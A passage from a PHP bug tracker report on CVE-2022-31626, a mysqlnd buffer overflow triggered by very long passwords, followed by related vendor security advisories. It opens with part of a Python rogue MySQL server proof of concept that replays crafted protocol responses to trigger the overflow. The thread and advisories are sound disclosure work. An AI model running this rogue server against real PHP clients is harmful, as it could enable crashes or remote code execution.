self.send('010000010f280000020364656600064556454e545308736368656d6174610244620244620cff0000010000fd81100000002a0000030364656600064556454e5453066576656e7473044e616d65044e616d650cff0000010000fd0110000000300000040364656600064556454e5453066576656e747307446566696e657207446566696e65720cff0080040000fd8110000000340000050364656600064556454e5453066576656e74730954696d65207a6f6e650954696d65207a6f6e650cff0000010000fd8110000000240000060364656600064556454e545300045479706504547970650cff0024000000fd0100000000300000070364656600064556454e5453000a457865637574652061740a457865637574652061740c3f00130000000c8000000000380000080364656600064556454e5453000e496e74657276616c2076616c75650e496e74657276616c2076616c75650cff0000040000fd00000000003e0000090364656600064556454e5453066576656e74730e496e74657276616c206669656c640e496e74657276616c206669656c640cff0048000000fe80010000002800000a0364656600064556454e54530006537461727473065374617274730c3f00130000000c80000000002400000b0364656600064556454e54530004456e647304456e64730c3f00130000000c80000000002e00000c0364656600064556454e5453066576656e747306537461747573065374617475730cff0048000000fe81110000003600000d0364656600064556454e5453066576656e74730a4f726967696e61746f720a4f726967696e61746f720c3f000a0000000321100000005200000e0364656600064556454e54530e6368617261637465725f73657473146368617261637465725f7365745f636c69656e74146368617261637465725f7365745f636c69656e740cff0000010000fd01100000004e00000f0364656600064556454e54530a636f6c6c6174696f6e7314636f6c6c6174696f6e5f636f6e6e656374696f6e14636f6c6c6174696f6e5f636f6e6e656374696f6e0cff0000010000fd01100000004a0000100364656600064556454e54530a636f6c6c6174696f6e7312446174616261736520436f6c6c6174696f6e12446174616261736520436f6c6c6174696f6e0cff0000010000fd011000000005000011fe0000220005000012fe00002200')
elif query.startswith(b'SELECT TABLE\_NAME AS Name'):
self.send('01000001033c0000020364656612696e666f726d6174696f6e5f736368656d61065441424c4553067461626c6573044e616d65044e616d650cff0000010000fd81100000003a0000030364656612696e666f726d6174696f6e5f736368656d61065441424c45530006456e67696e6506456e67696e650cff0000010000fd00000000003c0000040364656612696e666f726d6174696f6e5f736368656d61065441424c45530007436f6d6d656e7407436f6d6d656e740cff0000600000fc100000000005000005fe000002000a000006016106496e6e6f4442000d000007047465737406496e6e6f44420005000008fe00000200')
elif query.startswith(b'SELECT /\*+ MAX\_'):
self.send('01000001014e0000020364656612696e666f726d6174696f6e5f736368656d6108534348454d41544108736368656d6174610b534348454d415f4e414d450b534348454d415f4e414d450cff0000010000fd811000000005000003fe000022001300000412696e666f726d6174696f6e5f736368656d6106000005056d7973716c1300000612706572666f726d616e63655f736368656d61040000070373797305000008047465737405000009fe00002200')
elif query.startswith(b'SHOW INDEX FROM \`test\`'):
self.send('010000010f3500000203646566000f53484f575f53544154495354494353067461626c6573055461626c65055461626c650cff0000010000fd81100000003900000303646566000f53484f575f53544154495354494353000a4e6f6e5f756e697175650a4e6f6e5f756e697175650c3f00010000000301000000003500000403646566000f53484f575f5354415449535449435300084b65795f6e616d65084b65795f6e616d650cff0000010000fd00000000004f00000503646566000f53484f575f5354415449535449435312696e6465785f636f6c756d6e5f75736167650c5365715f696e5f696e6465780c5365715f696e5f696e6465780c3f000a0000000321100000003b00000603646566000f53484f575f53544154495354494353000b436f6c756d6e5f6e616d650b436f6c756d6e5f6e616d650cff0000010000fd00000000003700000703646566000f53484f575f535441544953544943530009436f6c6c6174696f6e09436f6c6c6174696f6e0cff0004000000fd00000000003b00000803646566000f53484f575f53544154495354494353000b43617264696e616c6974790b43617264696e616c6974790c3f00150000000800000000003500000903646566000f53484f575f5354415449535449435300085375625f70617274085375625f706172740c3f00150000000800000000001c00000a03646566000000065061636b6564000c3f00000000000680000000002d00000b03646566000f53484f575f5354415449535449435300044e756c6c044e756c6c0cff000c000000fd01000000003900000c03646566000f53484f575f53544154495354494353000a496e6465785f747970650a496e6465785f747970650cff002c000000fd81000000003300000d03646566000f53484f575f535441544953544943530007436f6d6d656e7407436f6d6d656e740cff0020000000fd01000000004600000e03646566000f53484f575f5354415449535449435307696e64657865730d496e6465785f636f6d6d656e740d496e6465785f636f6d6d656e740cff0000200000fd81100000003300000f03646566000f53484f575f53544154495354494353000756697369626c650756697369626c650cff000c000000fd01000000003900001003646566000f53484f575f53544154495354494353000a45787072657373696f6e0a45787072657373696f6e0cff00fffffffffc900000000005000011fe0000020005000012fe00000200')
elif query.startswith(b'EXPLAIN PARTITIONS SELECT \* FROM '):
self.send('b2000001ff2804233432303030596f75206861766520616e206572726f7220696e20796f75722053514c2073796e7461783b20636865636b20746865206d616e75616c207468617420636f72726573706f6e647320746f20796f7572204d7953514c207365727665722076657273696f6e20666f72207468652072696768742073796e74617820746f20757365206e656172202753454c454354202a2046524f4d20746573742e7465737427206174206c696e652031')
elif query.startswith(b'SELECT \* FROM test.test'):
self.handle\_select\_test()
elif query.startswith(b'SHOW WARNINGS'):
self.send('01000001031b00000203646566000000054c6576656c000cff001c000000fd01001f00001a0000030364656600000004436f6465000c3f000400000003a1000000001d00000403646566000000074d657373616765000cff0000080000fd01001f000005000005fe0000020005000006fe00000200')
else:
hexdump(query)
raise ProtoError()
class SQLServer: """Rogue MySQL server. “"” session_class = None
def \_\_init\_\_(self):
self.sessions = \[\]
self.socket = server(3306, callback=self.accept)
def accept(self, client\_socket):
self.sessions.append(
self.session\_class(client\_socket)
)
def set\_session\_handler(self, session\_class):
self.session\_class = session\_class
def stop(self):
self.socket.close()
for session in self.sessions:
session.die()
server = SQLServer() server.set_session_handler(Handler)
pause() ```
Patches
Add a Patch
Pull Requests
Add a Pull Request
History
AllCommentsChangesGit/SVN commitsRelated reports
[2022-05-17 13:59 UTC] [email protected]
-Status: Open +Status: Verified -Assigned To: +Assigned To: cmb
[2022-05-17 13:59 UTC] [email protected]
Thanks for reporting the issue (very thorough report)! I can reproduce the bug, and your patch would obviously solve that.
However, I’m having some issues with the server script, which apparently stalls at the end of the handshake (Handler.handle_handshake). It would be nice to commit that as regression test, though (and also as the beginning of a more general fake server test suite); maybe you have an idea how to fix that.
Anyway, as I understand it, this issue would only happen for *very* long passwords (~ 5000 bytes or more); that would likely *not* qualify this as security issue. Or are there other more likely cases which may trigger this bug?
[2022-05-25 21:34 UTC] [email protected]
I think since it can be common for a hosted tool to accept user-supplied password, and as required length is not ridiculous (5k, not gigabytes) we should treat it as security.
[2022-05-25 21:40 UTC] [email protected]
-CVE-ID: needed +CVE-ID: 2022-31626
[2022-05-31 13:43 UTC] c dot fol at ambionics dot io
Hello cmb,
Sorry for the delay, it looks like your tracker refuses to send me emails for this bug (although it works fine, usually). Have you made any progress regarding the server ? I implemented this server a long time ago, so I don’t really remember. I might be able to have a look next week if you’re still stuck.
Regards
[2022-06-07 10:27 UTC] [email protected]
> Have you made any progress regarding the server ?
No, I didn’t work further on that. I think the problem is that the test would always hang, but it was sufficient to trigger the buffer overflow. Now that the bug is fixed, the test would need to proceed.
[2022-06-15 07:24 UTC] [email protected]
-Status: Verified +Status: Closed
[2022-06-15 07:24 UTC] [email protected]
The fix for this bug has been committed. If you are still experiencing this bug, try to check out latest source from https://github.com/php/php-src and re-test. Thank you for the report, and for helping us make PHP better.
Related news
Vulnerability in the Oracle Demantra Demand Management product of Oracle Supply Chain (component: E-Business Collections). Supported versions that are affected are 12.1 and 12.2. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle Demantra Demand Management. Successful attacks of this vulnerability can result in unauthorized creation, deletion or modification access to critical data or all Oracle Demantra Demand Management accessible data. CVSS 3.1 Base Score 7.5 (Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N).
Gentoo Linux Security Advisory 202209-20 - Multiple vulnerabilities have been discovered in PHP, the worst of which could result in local root privilege escalation. Versions less than 7.4.30:7.4 are affected.
Conflicting business requirements is a common problem – and you find it in every corner of an organization, including in information technology. Resolving these conflicts is a must, but it isn’t always easy – though sometimes there is a novel solution that helps. In IT management there is a constant struggle between security and operations teams. Yes, both teams ultimately want to have secure
Red Hat Security Advisory 2022-5904-01 - PHP is an HTML-embedded scripting language commonly used with the Apache HTTP Server. Issues addressed include a buffer overflow vulnerability.
An update for php is now available for Red Hat Enterprise Linux 9. Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original. Related CVEs: * CVE-2022-31626: php: password of excessive length triggers buffer overflow leading to RCE
Ubuntu Security Notice 5479-3 - USN-5479-1 fixed vulnerabilities in PHP. Unfortunately that update for CVE-2022-31625 was incomplete for Ubuntu 18.04 LTS. This update fixes the problem. Charles Fol discovered that PHP incorrectly handled initializing certain arrays when handling the pg_query_params function. A remote attacker could use this issue to cause PHP to crash, resulting in a denial of service, or possibly execute arbitrary code. Charles Fol discovered that PHP incorrectly handled passwords in mysqlnd. A remote attacker could use this issue to cause PHP to crash, resulting in a denial of service, or possibly execute arbitrary code.
Ubuntu Security Notice 5479-2 - USN-5479-1 fixed vulnerabilities in PHP. This update provides the corresponding updates for Ubuntu 16.04 ESM. Charles Fol discovered that PHP incorrectly handled initializing certain arrays when handling the pg_query_params function. A remote attacker could use this issue to cause PHP to crash, resulting in a denial of service, or possibly execute arbitrary code. Charles Fol discovered that PHP incorrectly handled passwords in mysqlnd. A remote attacker could use this issue to cause PHP to crash, resulting in a denial of service, or possibly execute arbitrary code.
Red Hat Security Advisory 2022-5491-01 - PHP is an HTML-embedded scripting language commonly used with the Apache HTTP Server. Issues addressed include buffer overflow and privilege escalation vulnerabilities.
An update for rh-php73-php is now available for Red Hat Software Collections. Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original. Related CVEs: * CVE-2021-21703: php: Local privilege escalation via PHP-FPM * CVE-2021-21707: php: special character breaks path in xml parsing * CVE-2022-31625: php: uninitialized array in pg_query_params() leading to RCE * CVE-2022-31626: php: password of excessive length triggers buffer overflow leading to RCE
An update for the php:8.0 module is now available for Red Hat Enterprise Linux 8. Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original. Related CVEs: * CVE-2022-31626: php: password of excessive length triggers buffer overflow leading to RCE
An update for the php:7.4 module is now available for Red Hat Enterprise Linux 8. Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original. Related CVEs: * CVE-2022-31626: php: password of excessive length triggers buffer overflow leading to RCE
An update for the php:7.4 module is now available for Red Hat Enterprise Linux 8.4 Extended Update Support. Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original. Related CVEs: * CVE-2022-31626: php: password of excessive length triggers buffer overflow leading to RCE
Ubuntu Security Notice 5479-1 - Charles Fol discovered that PHP incorrectly handled initializing certain arrays when handling the pg_query_params function. A remote attacker could use this issue to cause PHP to crash, resulting in a denial of service, or possibly execute arbitrary code. Charles Fol discovered that PHP incorrectly handled passwords in mysqlnd. A remote attacker could use this issue to cause PHP to crash, resulting in a denial of service, or possibly execute arbitrary code.
The phar_make_dirstream function in ext/phar/dirstream.c in PHP before 5.6.18 and 7.x before 7.0.3 mishandles zero-size ././@LongLink files, which allows remote attackers to cause a denial of service (uninitialized pointer dereference) or possibly have unspecified other impact via a crafted TAR archive.